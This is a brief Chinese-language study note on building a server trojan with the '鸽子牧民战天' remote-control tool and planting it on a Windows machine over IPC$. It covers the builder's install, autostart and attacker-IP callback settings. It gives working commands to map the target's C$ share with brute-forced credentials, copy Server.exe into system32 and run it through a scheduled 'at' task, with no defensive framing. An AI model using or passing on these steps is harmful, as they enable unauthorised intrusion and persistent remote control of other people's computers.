【笔记】鸽子牧民战天学习笔记
前言
通过鸽子牧民战天制作服务器木马,并通过IPC$漏洞进行远程执行
制作木马
- 打开程序->
配置服务程序
- 在
安装选项配置木马在服务器安装的配置
- 在
启动项设置配置木马在服务器的自启动服务
- 在
自动上线设置配置攻击者的IP地址和木马在本地的保存路径->点击生成服务器生成木马
远程执行木马
使用IPC$漏洞将服务器的共享文件夹映射在本地
- 首先要通过暴力破解出服务器的Windows密码
<username>:用户名<password>:密码
1 | net use \\192.168.1.1\c$ <password> /user:<username> |
将木马上传到服务器
d:\Server:木马在本地存放的位置\\192.168.1.1\c$\windows\system32:上传到服务器的位置
1 | copy d:\Server.exe \\192.168.1.1\c$\windows\system32 |
通过为服务器添加计划任务达到远程执行木马
<time>:执行时间,格式HH:mm(最好在3分钟开外,防止系统误差,判定为第二天)
1 | at \\192.168.1.1 <time> "c:\windows\system32\Server.exe" |
查看远端计划任务列表
1 | at \\192.168.1.1 |
完成
